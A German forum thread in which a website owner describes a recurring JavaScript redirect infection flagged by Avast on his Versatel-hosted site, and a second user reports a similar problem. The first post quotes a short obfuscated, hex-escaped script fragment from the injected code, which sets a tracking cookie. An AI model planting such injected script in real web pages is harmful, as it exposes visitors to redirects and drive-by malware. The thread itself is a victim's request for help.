Hallo Leute,

ich hab mich jetzt mehrere Stunden durchs web gewühlt um mein Problem zu verstehen. Angefangen hat es mit einer Trojanerwarnung durch Avast beim Aufruf einer website (der Betreiber möchte nicht genannt werden).

Sign of JS:Redirector-AM[Trj] has been found on www.***.de

Danach wurde die Verbindung gekappt. Per Linux haben wir mit FTP Zugang die Seite lokal gesichert. Ein Scan hat nichts ergeben. Der Aufruf der Website erneut brachte auch keine neuen Meldungen. Die Meldung wurde aber durch andere, unabhängige User bestätigt.

Danach hab ich mich über das XSS informiert und Fehler, Lücken oder komprimitiert js, css, php oder html files gesucht. Es war nix zu finden. Auch keine neuen Ordner etc.

Sicherheitshalber wurde die Seite abgeschalten und eine einfach index.html ohne js und mit einer frischen css online gestellt.

Danach hab ich aus Gewohnheit ein validate.w3.org druchgezogen und siehe da: Errors found while checking this document as HTML 4.01 Transitional!

der validator lässt es zu, den source code zu checken, wodurch ich endlich das js sichtbar war:

Code: Alles auswählenAufklappen

ATTFilter

<script type="text/javascript" language="javascript">
 var oqcvyfi=new Date( ); oqcvyfi.setTime(oqcvyfi.getTime( )+12*60*60*1000); document.cookie="n\x5fses\x73_id\x3d53d\x312540afaf174fd0466f84\x316\x35af\x65e3"+"; path=/\x3b ex\x70\151\x72es="+oqcvyfi.toGMTString( ); 
</script>
         

Das geht ewig so weiter mit zig Links zu zwielichtigen Seiten. jetzt kommt aber der Gag: revalidiere ich das ganze, ist der code ok... eben meine html seite wird sichtbar. Erst dachet ich W3 cached, aber nach einer Weile war das XSS wieder da.

Ich hab dann hier im Board Links gefunden die mit Hilfe von php bzw. .htaccess Abhilfe schaffen sollten, aber keine Chance. Ich hab keinen blassen Schimmer wo das Ding herkommt. Webserver mit Lücken? Das problem ist: eh Versatel handelt, hab ich mir ne Abmahnung wegen illegalen Links eingefangen.

bin für alle Tipps dankbar. Weiss nicht weiter...

EDIT: http://forum.avast.com/index.php?topic=52093.0
Hilft aber auch nicht. Da auf dem vhost unter der domain nix weiter ist, kann ein weiterer vhost auf dem SErver über ein veraltetest CMS oder was weiss ich die Probleme verursachen?

Hallo Timo,

leider kann ich dir direkt auch nicht helfen, nur mitteilen, dass ich mit Versatel ebenfalls ein Problem habe. Ein CMS von unserem Kunden, dass auf einem Versatel-Webserver liegt, ist ebenfalls mit Viren befahlen. Wahrscheinlich der gleiche Trick, wie bei dir. Irgendein Javascript-Scheiß versucht einen Virus ('HTML/Crypted.Gen' [virus] ) auf den Client-Rechner zu spielen. Habe ebenfalls die Dateien durch mehrere Viren-Scanner gejagt, aber nichts gefunden. Die Datenbank scheint auch ok zu sein. Sogar, wo ich die index.php rausgenommen habe, wollte er über die Fehlerseite 403 das Virus auf meinen Rechner spielen. Anscheinend funktioniert das ganze aber nur auf dem Internet-Explorer. Firefox ist wohl Immun. Ich vermute, es sind einige Webserver befahlen. Das Script muss irgendwie über den HTTP-Header eingespielt werden. Frag mich aber nicht, wie das geht. Ist aber nur ein Vermutung von mir. Ich hoffe auch noch, dass der Hoster das Problem in den Griff bekommt.

Viele Grüße

Leonhard